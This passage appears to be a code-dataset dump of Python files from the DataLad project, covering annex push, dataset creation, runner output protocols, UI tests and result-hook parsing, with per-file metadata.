or by modification report\n c.get('state', None) not in ('clean', 'deleted'))\n # only consider annex'ed files\n and 'key' in c\n )\n ]\n if got_path_arg:\n for c in [c for c in to_transfer if not c.get('has_content', False)]:\n yield dict(\n res_kwargs,\n type=c['type'],\n path=c['path'],\n action='copy',\n status='impossible',\n message='Slated for transport, but no content present',\n )\n\n cmd = ['copy', '--batch', '-z', '--to', target]\n\n if jobs:\n cmd.extend(['--jobs', str(jobs)])\n\n # Since we got here - we already have some data != \"nothing\"\n if (data == 'auto') or \\\n (\n (data == 'auto-if-wanted') and\n ds_repo.get_preferred_content('wanted', target)\n ):\n lgr.debug(\"Invoking copy --auto\")\n cmd.append('--auto')\n\n if force not in ('all', 'checkdatapresent'):\n # if we force, we do not trust local knowledge and do the checks\n cmd.append('--fast')\n\n lgr.debug(\"Pushing data from %s to '%s'\", ds, target)\n\n # input has type=dataset, but now it is about files\n res_kwargs.pop('type', None)\n\n # A set and a dict is used to track files pointing to the\n # same key. 
The set could be dropped, using a single dictionary\n # that has an entry for every seen key and a (likely empty) list\n # of redundant files, but that would mean looping over potentially\n # many keys to yield likely few if any notneeded results.\n seen_keys = set()\n repkey_paths = dict()\n\n # produce final path list. use knowledge that annex command will\n # run in the root of the dataset and compact paths to be relative\n # to this location\n file_list = b''\n nbytes = 0\n for c in to_transfer:\n key = c['key']\n if key in seen_keys:\n repkey_paths.setdefault(key, []).append(c['path'])\n else:\n file_list += bytes(Path(c['path']).relative_to(ds.pathobj))\n file_list += b'\\0'\n nbytes += c.get('bytesize', 0)\n seen_keys.add(key)\n lgr.debug('Counted %d bytes of annex data to transfer',\n nbytes)\n\n # and go\n res = ds_repo._call_annex_records(\n cmd,\n git_options=[\n \"-c\",\n \"annex.retry={}\".format(\n ds_repo.config.obtain(\"datalad.annex.retry\"))]\n if ds_repo.config.get(\"annex.retry\") else None,\n stdin=file_list,\n progress=True,\n # tailor the progress protocol with the total number of files\n # to be transferred\n total_nbytes=nbytes)\n for j in res:\n yield annexjson2result(j, ds, type='file', **res_kwargs)\n\n for annex_key, paths in repkey_paths.items():\n for path in paths:\n yield dict(\n res_kwargs, action='copy', type='file', status='notneeded',\n path=path, annexkey=annex_key,\n message='Another file points to the same key')\n return\n\n\ndef _get_corresponding_remote_state(repo, to):\n since = None\n # for managed branches we cannot assume a matching one at the remote end\n # instead we target the corresponding branch\n active_branch = repo.get_corresponding_branch() or repo.get_active_branch()\n\n if to:\n # XXX here we assume one to one mapping of names from local branches\n # to the remote\n since = '%s/%s' % (to, active_branch)\n else:\n # take tracking remote for the active branch\n tracked_remote, tracked_refspec = repo.get_tracking_branch()\n if tracked_remote:\n if tracked_refspec.startswith('refs/heads/'):\n tracked_refspec = tracked_refspec[len('refs/heads/'):]\n #to = tracked_remote\n since = '%s/%s' % (tracked_remote, tracked_refspec)\n return since\n" }, { "alpha_fraction": 0.47640448808670044, "alphanum_fraction": 0.483146071434021, "avg_line_length": 36.08333206176758, "blob_id": "f5404c2800bec7747c50f308acc9373fb32b49c5", "content_id": "9fe85d3766e42c8e9bd6d23ce28957c948cfc4cd", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 445, "license_type": "permissive", "max_line_length": 79, "num_lines": 12, "path": "/datalad/support/tests/utils.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Utils for testing support module\n\"\"\"\n\nfrom datalad.support.external_versions import external_versions\nfrom datalad.tests.utils_pytest import *\n" }, { "alpha_fraction": 0.5805310010910034, "alphanum_fraction": 0.5858407020568848, "avg_line_length": 24.917430877685547, "blob_id": "f9a9107c80c4fe6e05f9dda0ef77f52223471c65", "content_id": "b4115cecea2b9dfc4b0119113c73d5cb4784b455", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, 
"is_vendor": false, "language": "Python", "length_bytes": 2825, "license_type": "permissive", "max_line_length": 88, "num_lines": 109, "path": "/datalad/ui/tests/test_base.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-wstrth: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"tests for UI switcher\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nfrom unittest.mock import patch\n\nfrom ...tests.utils_pytest import (\n assert_equal,\n assert_false,\n assert_not_equal,\n assert_raises,\n with_testsui,\n)\nfrom .. import _UI_Switcher\nfrom ..dialog import (\n ConsoleLog,\n DialogUI,\n IPythonUI,\n)\n\n\ndef test_ui_switcher():\n ui = _UI_Switcher('dialog')\n assert(isinstance(ui.ui, DialogUI))\n message_str = str(ui.message)\n assert_equal(message_str, str(ui._ui.message))\n\n ui.set_backend('console')\n assert(isinstance(ui.ui, ConsoleLog))\n assert_equal(str(ui.message), str(ui._ui.message))\n assert_not_equal(message_str, str(ui._ui.message))\n with assert_raises(AttributeError):\n ui.yesno\n\n ui.set_backend('annex')\n\n # Let's pretend we are under IPython\n class ZMQInteractiveShell(object):\n pass\n\n with patch('datalad.utils.get_ipython',\n lambda: ZMQInteractiveShell(),\n create=True):\n ui = _UI_Switcher()\n assert (isinstance(ui.ui, IPythonUI))\n\n\ndef test_tests_ui():\n ui = _UI_Switcher('dialog')\n # Let's test our responses construct\n ui.set_backend('tests')\n with ui.add_responses('abc'):\n assert_equal(ui.question(\"text\"), 'abc')\n\n with ui.add_responses(['a', 'bb']):\n assert_equal(ui.question(\"text\"), 'a')\n assert_equal(ui.question(\"text\"), 'bb')\n\n # should raise exception if not all responses were\n # used\n with assert_raises(AssertionError):\n with ui.add_responses(['a', 'bb']):\n assert_equal(ui.question(\"text\"), 'a')\n\n # but clear it up\n assert_false(ui.get_responses())\n\n # assure that still works\n with ui.add_responses('abc'):\n assert_equal(ui.question(\"text\"), 'abc')\n\n # and if we switch back to some other backend -- we would loose *responses methods\n ui.set_backend('annex')\n assert_false(hasattr(ui, 'add_responses'))\n\n\ndef test_with_testsui():\n\n @with_testsui\n def nothing(x, k=1):\n assert_equal(x, 1)\n assert_equal(k, 2)\n\n nothing(1, k=2)\n\n @with_testsui(responses='a')\n def nothing(x, k=1):\n assert_equal(x, 1)\n assert_equal(k, 2)\n\n # responses were not used\n assert_raises(AssertionError, nothing, 1, k=2)\n\n from datalad.ui import ui\n\n @with_testsui(responses='a')\n def ask():\n assert_equal(ui.question('what is a?'), 'a')\n\n\n ask()\n" }, { "alpha_fraction": 0.613942563533783, "alphanum_fraction": 0.6186291575431824, "avg_line_length": 28.947368621826172, "blob_id": "83db6573ac4e6e133773c3319d9415ff78ed76b1", "content_id": "de8f8ceaef1b21b8c6d57e53b60583605b89e45f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1707, "license_type": "permissive", "max_line_length": 87, "num_lines": 57, "path": "/datalad/runner/coreprotocols.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# 
ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Generic core protocols for use with the DataLad runner\n\"\"\"\n\nimport logging\n\nfrom .protocol import WitlessProtocol\n\nlgr = logging.getLogger('datalad.runner.coreprotocols')\n\n\nclass NoCapture(WitlessProtocol):\n \"\"\"WitlessProtocol that captures no subprocess output\n\n As this is identical with the behavior of the WitlessProtocol base class,\n this class is merely a more readable convenience alias.\n \"\"\"\n pass\n\n\nclass StdOutCapture(WitlessProtocol):\n \"\"\"WitlessProtocol that only captures and returns stdout of a subprocess\"\"\"\n proc_out = True\n\n\nclass StdErrCapture(WitlessProtocol):\n \"\"\"WitlessProtocol that only captures and returns stderr of a subprocess\"\"\"\n proc_err = True\n\n\nclass StdOutErrCapture(WitlessProtocol):\n \"\"\"WitlessProtocol that captures and returns stdout/stderr of a subprocess\n \"\"\"\n proc_out = True\n proc_err = True\n\n\nclass KillOutput(WitlessProtocol):\n \"\"\"WitlessProtocol that swallows stdout/stderr of a subprocess\n \"\"\"\n proc_out = True\n proc_err = True\n\n def pipe_data_received(self, fd: int, data: bytes) -> None:\n assert self.process is not None\n if lgr.isEnabledFor(5):\n lgr.log(\n 5,\n 'Discarded %i bytes from %i[%s]',\n len(data), self.process.pid, self.fd_infos[fd][0])\n" }, { "alpha_fraction": 0.5708751678466797, "alphanum_fraction": 0.571956217288971, "avg_line_length": 37.67770004272461, "blob_id": "a8ec979107967404b65f5f49987886317ea6db4c", "content_id": "d49f5ddff94fb93b5b2e5dc25435b7333c28d8db", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 22201, "license_type": "permissive", "max_line_length": 90, "num_lines": 574, "path": "/datalad/core/local/create.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"High-level interface for dataset creation\n\n\"\"\"\n\nimport os\nimport logging\nimport random\nimport uuid\nimport warnings\nfrom argparse import (\n REMAINDER,\n)\n\nfrom os import listdir\nimport os.path as op\n\nfrom datalad import cfg\nfrom datalad import _seed\nfrom datalad.interface.base import Interface\nfrom datalad.interface.base import (\n build_doc,\n eval_results,\n)\nfrom datalad.interface.common_opts import (\n location_description,\n)\nfrom datalad.support.constraints import (\n EnsureStr,\n EnsureNone,\n EnsureKeyChoice,\n)\nfrom datalad.support.param import Parameter\nfrom datalad.utils import (\n getpwd,\n ensure_list,\n get_dataset_root,\n Path,\n)\n\nfrom datalad.distribution.dataset import (\n Dataset,\n datasetmethod,\n EnsureDataset,\n resolve_path,\n path_under_rev_dataset,\n require_dataset,\n)\n\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.support.annexrepo import AnnexRepo\n\n\n__docformat__ = 'restructuredtext'\n\nlgr = 
logging.getLogger('datalad.core.local.create')\n\n\n@build_doc\nclass Create(Interface):\n \"\"\"Create a new dataset from scratch.\n\n This command initializes a new dataset at a given location, or the\n current directory. The new dataset can optionally be registered in an\n existing superdataset (the new dataset's path needs to be located\n within the superdataset for that, and the superdataset needs to be given\n explicitly via [PY: `dataset` PY][CMD: --dataset CMD]). It is recommended\n to provide a brief description to label the dataset's nature *and*\n location, e.g. \"Michael's music on black laptop\". This helps humans to\n identify data locations in distributed scenarios. By default an identifier\n comprised of user and machine name, plus path will be generated.\n\n This command only creates a new dataset, it does not add existing content\n to it, even if the target directory already contains additional files or\n directories.\n\n Plain Git repositories can be created via [PY: `annex=False` PY][CMD: --no-annex CMD].\n However, the result will not be a full dataset, and, consequently,\n not all features are supported (e.g. a description).\n\n || REFLOW >>\n To create a local version of a remote dataset use the\n :func:`~datalad.api.install` command instead.\n << REFLOW ||\n\n .. note::\n Power-user info: This command uses :command:`git init` and\n :command:`git annex init` to prepare the new dataset. Registering to a\n superdataset is performed via a :command:`git submodule add` operation\n in the discovered superdataset.\n \"\"\"\n\n # in general this command will yield exactly one result\n return_type = 'item-or-list'\n # in general users expect to get an instance of the created dataset\n result_xfm = 'datasets'\n # result filter\n result_filter = \\\n EnsureKeyChoice('action', ('create',)) & \\\n EnsureKeyChoice('status', ('ok', 'notneeded'))\n\n _examples_ = [\n dict(text=\"Create a dataset 'mydataset' in the current directory\",\n code_py=\"create(path='mydataset')\",\n code_cmd=\"datalad create mydataset\"),\n dict(text=\"Apply the text2git procedure upon creation of a dataset\",\n code_py=\"create(path='mydataset', cfg_proc='text2git')\",\n code_cmd=\"datalad create -c text2git mydataset\"),\n dict(text=\"Create a subdataset in the root of an existing dataset\",\n code_py=\"create(dataset='.', path='mysubdataset')\",\n code_cmd=\"datalad create -d . mysubdataset\"),\n dict(text=\"Create a dataset in an existing, non-empty directory\",\n code_py=\"create(force=True)\",\n code_cmd=\"datalad create --force\"),\n dict(text=\"Create a plain Git repository\",\n code_py=\"create(path='mydataset', annex=False)\",\n code_cmd=\"datalad create --no-annex mydataset\"),\n ]\n\n _params_ = dict(\n path=Parameter(\n args=(\"path\",),\n nargs='?',\n metavar='PATH',\n doc=\"\"\"path where the dataset shall be created, directories\n will be created as necessary. If no location is provided, a dataset\n will be created in the location specified by [PY: `dataset`\n PY][CMD: --dataset CMD] (if given) or the current working\n directory. Either way the command will error if the target\n directory is not empty. Use [PY: `force` PY][CMD: --force CMD] to\n create a dataset in a non-empty directory.\"\"\",\n # put dataset 2nd to avoid useless conversion\n constraints=EnsureStr() | EnsureDataset() | EnsureNone()),\n initopts=Parameter(\n args=(\"initopts\",),\n metavar='INIT OPTIONS',\n nargs=REMAINDER,\n doc=\"\"\"options to pass to :command:`git init`. 
[PY: Options can be\n given as a list of command line arguments or as a GitPython-style\n option dictionary PY][CMD: Any argument specified after the\n destination path of the repository will be passed to git-init\n as-is CMD]. Note that not all options will lead to viable results.\n For example '--bare' will not yield a repository where DataLad\n can adjust files in its working tree.\"\"\"),\n dataset=Parameter(\n args=(\"-d\", \"--dataset\"),\n metavar='DATASET',\n doc=\"\"\"specify the dataset to perform the create operation on. If\n a dataset is given along with `path`, a new subdataset will be created\n in it at the `path` provided to the create command. If a dataset is\n given but `path` is unspecified, a new dataset will be created at the\n location specified by this option.\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n force=Parameter(\n args=(\"-f\", \"--force\",),\n doc=\"\"\"enforce creation of a dataset in a non-empty directory\"\"\",\n action='store_true'),\n description=location_description,\n annex=Parameter(\n args=(\"--no-annex\",),\n dest='annex',\n doc=\"\"\"if [CMD: set CMD][PY: disabled PY], a plain Git repository\n will be created without any annex\"\"\",\n action='store_false'),\n # TODO seems to only cause a config flag to be set, this could be done\n # in a procedure\n fake_dates=Parameter(\n args=('--fake-dates',),\n action='store_true',\n doc=\"\"\"Configure the repository to use fake dates. The date for a\n new commit will be set to one second later than the latest commit\n in the repository. This can be used to anonymize dates.\"\"\"),\n cfg_proc=Parameter(\n args=(\"-c\", \"--cfg-proc\"),\n metavar=\"PROC\",\n action='append',\n doc=\"\"\"Run cfg_PROC procedure(s) (can be specified multiple times)\n on the created dataset. Use\n [PY: `run_procedure(discover=True)` PY][CMD: run-procedure --discover CMD]\n to get a list of available procedures, such as cfg_text2git.\n \"\"\"\n )\n )\n\n @staticmethod\n @datasetmethod(name='create')\n @eval_results\n def __call__(\n path=None,\n initopts=None,\n *,\n force=False,\n description=None,\n dataset=None,\n annex=True,\n fake_dates=False,\n cfg_proc=None\n ):\n # we only perform negative tests below\n no_annex = not annex\n\n if dataset:\n if isinstance(dataset, Dataset):\n ds = dataset\n else:\n ds = Dataset(dataset)\n refds_path = ds.path\n else:\n ds = refds_path = None\n\n # two major cases\n # 1. we got a `dataset` -> we either want to create it (path is None),\n # or another dataset in it (path is not None)\n # 2. we got no dataset -> we want to create a fresh dataset at the\n # desired location, either at `path` or PWD\n\n # sanity check first\n if no_annex:\n if description:\n raise ValueError(\"Incompatible arguments: cannot specify \"\n \"description for annex repo and declaring \"\n \"no annex repo.\")\n\n if (isinstance(initopts, (list, tuple)) and '--bare' in initopts) or (\n isinstance(initopts, dict) and 'bare' in initopts):\n raise ValueError(\n \"Creation of bare repositories is not supported. 
Consider \"\n \"one of the create-sibling commands, or use \"\n \"Git to init a bare repository and push an existing dataset \"\n \"into it.\")\n\n if path:\n path = resolve_path(path, dataset)\n\n path = path if path \\\n else getpwd() if ds is None \\\n else refds_path\n\n # we know that we need to create a dataset at `path`\n assert(path is not None)\n\n # assure cfg_proc is a list (relevant if used via Python API)\n cfg_proc = ensure_list(cfg_proc)\n\n # prep for yield\n res = dict(action='create', path=str(path),\n logger=lgr, type='dataset',\n refds=refds_path)\n\n refds = None\n if refds_path and refds_path != str(path):\n refds = require_dataset(\n refds_path, check_installed=True,\n purpose='create a subdataset')\n\n path_inrefds = path_under_rev_dataset(refds, path)\n if path_inrefds is None:\n yield dict(\n res,\n status='error',\n message=(\n \"dataset containing given paths is not underneath \"\n \"the reference dataset %s: %s\",\n ds, str(path)),\n )\n return\n\n # try to locate an immediate parent dataset\n # we want to know this (irrespective of whether we plan on adding\n # this new dataset to a parent) in order to avoid conflicts with\n # a potentially absent/uninstalled subdataset of the parent\n # in this location\n # it will cost some filesystem traversal though...\n parentds_path = get_dataset_root(\n op.normpath(op.join(str(path), os.pardir)))\n if parentds_path:\n prepo = GitRepo(parentds_path)\n parentds_path = Path(parentds_path)\n # we cannot get away with a simple\n # GitRepo.get_content_info(), as we need to detect\n # uninstalled/added subdatasets too\n check_path = Path(path)\n pstatus = prepo.status(\n untracked='no',\n # limit query to target path for a potentially massive speed-up\n paths=[check_path.relative_to(parentds_path)])\n if (not pstatus.get(check_path, {}).get(\"type\") == \"dataset\" and\n any(check_path == p or check_path in p.parents\n for p in pstatus)):\n # redo the check in a slower fashion, it is already broken\n # let's take our time for a proper error message\n conflict = [\n p for p in pstatus\n if check_path == p or check_path in p.parents]\n res.update({\n 'status': 'error',\n 'message': (\n 'collision with content in parent dataset at %s: %s',\n str(parentds_path),\n [str(c) for c in conflict])})\n yield res\n return\n if not force:\n # another set of check to see whether the target path is pointing\n # into a known subdataset that is not around ATM\n subds_status = {\n parentds_path / k.relative_to(prepo.path)\n for k, v in pstatus.items()\n if v.get('type', None) == 'dataset'}\n check_paths = [check_path]\n check_paths.extend(check_path.parents)\n if any(p in subds_status for p in check_paths):\n conflict = [p for p in check_paths if p in subds_status]\n res.update({\n 'status': 'error',\n 'message': (\n 'collision with %s (dataset) in dataset %s',\n str(conflict[0]),\n str(parentds_path))})\n yield res\n return\n\n # important to use the given Dataset object to avoid spurious ID\n # changes with not-yet-materialized Datasets\n tbds = ds if isinstance(ds, Dataset) and \\\n ds.path == path else Dataset(str(path))\n\n # don't create in non-empty directory without `force`:\n if op.isdir(tbds.path) and listdir(tbds.path) != [] and not force:\n res.update({\n 'status': 'error',\n 'message':\n 'will not create a dataset in a non-empty directory, use '\n '`--force` option to ignore'})\n yield res\n return\n\n # Check if specified cfg_proc(s) can be discovered, storing\n # the results so they can be used when the time comes to run\n # the 
procedure. If a procedure cannot be found, raise an\n # error to prevent creating the dataset.\n cfg_proc_specs = []\n if cfg_proc:\n discovered_procs = tbds.run_procedure(\n discover=True,\n result_renderer='disabled',\n return_type='list',\n )\n for cfg_proc_ in cfg_proc:\n for discovered_proc in discovered_procs:\n if discovered_proc['procedure_name'] == 'cfg_' + cfg_proc_:\n cfg_proc_specs.append(discovered_proc)\n break\n else:\n raise ValueError(\"Cannot find procedure with name \"\n \"'%s'\" % cfg_proc_)\n\n if initopts is not None and isinstance(initopts, list):\n initopts = {'_from_cmdline_': initopts}\n\n # Note for the code below:\n # OPT: be \"smart\" and avoid re-resolving .repo -- expensive in DataLad\n # Re-use tbrepo instance, do not use tbds.repo\n\n # create and configure desired repository\n # also provides initial set of content to be tracked with git (not annex)\n if no_annex:\n tbrepo, add_to_git = _setup_git_repo(path, initopts, fake_dates)\n else:\n tbrepo, add_to_git = _setup_annex_repo(\n path, initopts, fake_dates, description)\n\n # OPT: be \"smart\" and avoid re-resolving .repo -- expensive in DataLad\n # Note, must not happen earlier (before if) since \"smart\" it would not be\n tbds_config = tbds.config\n\n # record an ID for this repo for the afterlife\n # to be able to track siblings and children\n id_var = 'datalad.dataset.id'\n # Note, that Dataset property `id` will change when we unset the\n # respective config. Therefore store it before:\n tbds_id = tbds.id\n if id_var in tbds_config:\n # make sure we reset this variable completely, in case of a\n # re-create\n tbds_config.unset(id_var, scope='branch')\n\n if _seed is None:\n # just the standard way\n # use a fully random identifier (i.e. UUID version 4)\n uuid_id = str(uuid.uuid4())\n else:\n # Let's generate preseeded ones\n uuid_id = str(uuid.UUID(int=random.getrandbits(128)))\n tbds_config.add(\n id_var,\n tbds_id if tbds_id is not None else uuid_id,\n scope='branch',\n reload=False)\n\n # make config overrides permanent in the repo config\n # this is similar to what `annex init` does\n # we are only doing this for config overrides and do not expose\n # a dedicated argument, because it is sufficient for the cmdline\n # and unnecessary for the Python API (there could simply be a\n # subsequence ds.config.add() call)\n for k, v in tbds_config.overrides.items():\n tbds_config.add(k, v, scope='local', reload=False)\n\n # all config manipulation is done -> fll reload\n tbds_config.reload()\n\n # must use the repo.pathobj as this will have resolved symlinks\n add_to_git[tbrepo.pathobj / '.datalad'] = {\n 'type': 'directory',\n 'state': 'untracked'}\n\n # save everything, we need to do this now and cannot merge with the\n # call below, because we may need to add this subdataset to a parent\n # but cannot until we have a first commit\n tbrepo.save(\n message='[DATALAD] new dataset',\n git=True,\n # we have to supply our own custom status, as the repo does\n # not have a single commit yet and the is no HEAD reference\n # TODO make `GitRepo.status()` robust to this state.\n _status=add_to_git,\n )\n\n for cfg_proc_spec in cfg_proc_specs:\n yield from tbds.run_procedure(\n cfg_proc_spec,\n result_renderer='disabled',\n return_type='generator',\n )\n\n # the next only makes sense if we saved the created dataset,\n # otherwise we have no committed state to be registered\n # in the parent\n if isinstance(refds, Dataset) and refds.path != tbds.path:\n # we created a dataset in another dataset\n # -> make 
submodule\n yield from refds.save(\n path=tbds.path,\n return_type='generator',\n result_renderer='disabled',\n )\n else:\n # if we do not save, we touch the root directory of the new\n # dataset to signal a change in the nature of the directory.\n # this is useful for apps like datalad-gooey (or other\n # inotify consumers) to pick up on such changes.\n tbds.pathobj.touch()\n\n res.update({'status': 'ok'})\n yield res\n\n\ndef _setup_git_repo(path, initopts=None, fake_dates=False):\n \"\"\"Create and configure a repository at `path`\n\n Parameters\n ----------\n path: str or Path\n Path of the repository\n initopts: dict, optional\n Git options to be passed to the GitRepo constructor\n fake_dates: bool, optional\n Passed to the GitRepo constructor\n\n Returns\n -------\n GitRepo, dict\n Created repository and records for any repo component that needs to be\n passed to git-add as a result of the setup procedure.\n \"\"\"\n tbrepo = GitRepo(\n path,\n create=True,\n create_sanity_checks=False,\n git_opts=initopts,\n fake_dates=fake_dates)\n # place a .noannex file to indicate annex to leave this repo alone\n stamp_path = Path(tbrepo.path) / '.noannex'\n stamp_path.touch()\n add_to_git = {\n stamp_path: {\n 'type': 'file',\n 'state': 'untracked',\n }\n }\n return tbrepo, add_to_git\n\n\ndef _setup_annex_repo(path, initopts=None, fake_dates=False,\n description=None):\n \"\"\"Create and configure a repository at `path`\n\n This includes a default setup of annex.largefiles.\n\n Parameters\n ----------\n path: str or Path\n Path of the repository\n initopts: dict, optional\n Git options to be passed to the AnnexRepo constructor\n fake_dates: bool, optional\n Passed to the AnnexRepo constructor\n description: str, optional\n Passed to the AnnexRepo constructor\n\n Returns\n -------\n AnnexRepo, dict\n Created repository and records for any repo component that needs to be\n passed to git-add as a result of the setup procedure.\n \"\"\"\n # always come with annex when created from scratch\n tbrepo = AnnexRepo(\n path,\n create=True,\n create_sanity_checks=False,\n # do not set backend here, to avoid a dedicated commit\n backend=None,\n # None causes version to be taken from config\n version=None,\n description=description,\n git_opts=initopts,\n fake_dates=fake_dates\n )\n # set the annex backend in .gitattributes as a staged change\n tbrepo.set_default_backend(\n cfg.obtain('datalad.repo.backend'),\n persistent=True, commit=False)\n add_to_git = {\n tbrepo.pathobj / '.gitattributes': {\n 'type': 'file',\n 'state': 'added',\n }\n }\n # make sure that v6 annex repos never commit content under .datalad\n attrs_cfg = (\n ('config', 'annex.largefiles', 'nothing'),\n )\n attrs = tbrepo.get_gitattributes(\n [op.join('.datalad', i[0]) for i in attrs_cfg])\n set_attrs = []\n for p, k, v in attrs_cfg:\n if not attrs.get(\n op.join('.datalad', p), {}).get(k, None) == v:\n set_attrs.append((p, {k: v}))\n if set_attrs:\n tbrepo.set_gitattributes(\n set_attrs,\n attrfile=op.join('.datalad', '.gitattributes'))\n\n # prevent git annex from ever annexing .git* stuff (gh-1597)\n attrs = tbrepo.get_gitattributes('.git')\n if not attrs.get('.git', {}).get(\n 'annex.largefiles', None) == 'nothing':\n tbrepo.set_gitattributes([\n ('**/.git*', {'annex.largefiles': 'nothing'})])\n # must use the repo.pathobj as this will have resolved symlinks\n add_to_git[tbrepo.pathobj / '.gitattributes'] = {\n 'type': 'file',\n 'state': 'untracked'}\n return tbrepo, add_to_git\n" }, { "alpha_fraction": 0.5891954898834229, 
"alphanum_fraction": 0.5913978219032288, "avg_line_length": 35.58293914794922, "blob_id": "bb7163887fbe802527625d66a979b6154d528b2d", "content_id": "65a7bfeede05fcb93f4f16e9d2e42440087d4f0b", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7719, "license_type": "permissive", "max_line_length": 87, "num_lines": 211, "path": "/datalad/core/local/resulthooks.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Utility functions for result hooks\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport logging\nimport json\n\nfrom datalad.support.exceptions import CapturedException\n\nlgr = logging.getLogger('datalad.core.local.resulthooks')\n\n\ndef get_jsonhooks_from_config(cfg):\n \"\"\"Parse out hook definitions given a ConfigManager instance\n\n Returns\n -------\n dict\n where keys are hook names/labels, and each value is a dict with\n three keys: 'cmd' contains the name of the to-be-executed DataLad\n command; 'args' has a JSON-encoded string with a dict of keyword\n arguments for the command (format()-language based placeholders\n can be present); 'match' holds a JSON-encoded string representing\n a dict with key/value pairs that need to match a result in order\n for a hook to be triggered.\n \"\"\"\n hooks = {}\n for h in cfg.keys():\n if not (h.startswith('datalad.result-hook.') and h.endswith('.match-json')):\n continue\n hook_basevar = h[:-11]\n hook_name = hook_basevar[20:]\n # do not use a normal `get()` here, because it reads the committed dataset\n # config too. That means a datalad update can silently bring in new\n # procedure definitions from the outside, and in some sense enable\n # remote code execution by a 3rd-party\n call = cfg.get_from_source(\n 'local',\n '{}.call-json'.format(hook_basevar),\n None\n )\n if not call:\n lgr.warning(\n 'Incomplete result hook configuration %s in %s' % (\n hook_basevar, cfg))\n continue\n # split command from any args\n call = call.split(maxsplit=1)\n # get the match specification in JSON format\n try:\n match = json.loads(cfg.get(h))\n except Exception as e:\n ce = CapturedException(e)\n lgr.warning(\n 'Invalid match specification in %s: %s [%s], '\n 'hook will be skipped',\n h, cfg.get(h), ce)\n continue\n\n hooks[hook_name] = dict(\n cmd=call[0],\n # support no-arg calls too\n args=call[1] if len(call) > 1 else '{{}}',\n match=match,\n )\n return hooks\n\n\ndef match_jsonhook2result(hook, res, match):\n \"\"\"Evaluate a hook's result match definition against a concrete result\n\n A match definition is a dict that can contain any number of keys. For each\n key it is tested, if the value matches the one in a given result.\n If all present key/value pairs match, the hook is executed. In addition to\n ``==`` tests, ``in``, ``not in``, and ``!=`` tests are supported. The\n test operation can be given by wrapping the test value into a list, the\n first item is the operation label 'eq', 'neq', 'in', 'nin'; the second value\n is the test value (set). 
Example::\n\n {\n \"type\": [\"in\", [\"file\", \"directory\"]],\n \"action\": \"get\",\n \"status\": \"notneeded\"\n }\n\n If a to be tested value is a list, an 'eq' operation needs to be specified\n explicitly in order to disambiguate the definition.\n\n Parameters\n ----------\n hook : str\n Name of the hook\n res : dict\n Result dictionary\n match : dict\n Match definition (see above for details).\n\n Returns\n -------\n bool\n True if the given result matches the hook's match definition, or\n False otherwise.\n \"\"\"\n for k, v in match.items():\n # do not test 'k not in res', because we could have a match that\n # wants to make sure that a particular value is not present, and\n # not having the key would be OK in that case\n\n # in case the target value is an actual list, an explicit action 'eq'\n # must be given\n action, val = (v[0], v[1]) if isinstance(v, list) else ('eq', v)\n if action == 'eq':\n if k in res and res[k] == val:\n continue\n elif action == 'neq':\n if k not in res or res[k] != val:\n continue\n elif action == 'in':\n if k in res and res[k] in val:\n continue\n elif action == 'nin':\n if k not in res or res[k] not in val:\n continue\n else:\n lgr.warning(\n 'Unknown result comparison operation %s for hook %s, skipped',\n action, hook)\n # indentation level is intended!\n return False\n return True\n\n\ndef run_jsonhook(hook, spec, res, dsarg=None):\n \"\"\"Execute a hook on a given result\n\n A hook definition's 'call' specification may contain placeholders that\n will be expanded using matching values in the given result record. In\n addition to keys in the result a '{dsarg}' placeholder is supported.\n The characters '{' and '}' in the 'call' specification that are not part\n of format() placeholders have to be escaped as '{{' and '}}'. Example\n 'call' specification to execute the DataLad ``unlock`` command::\n\n unlock {{\"dataset\": 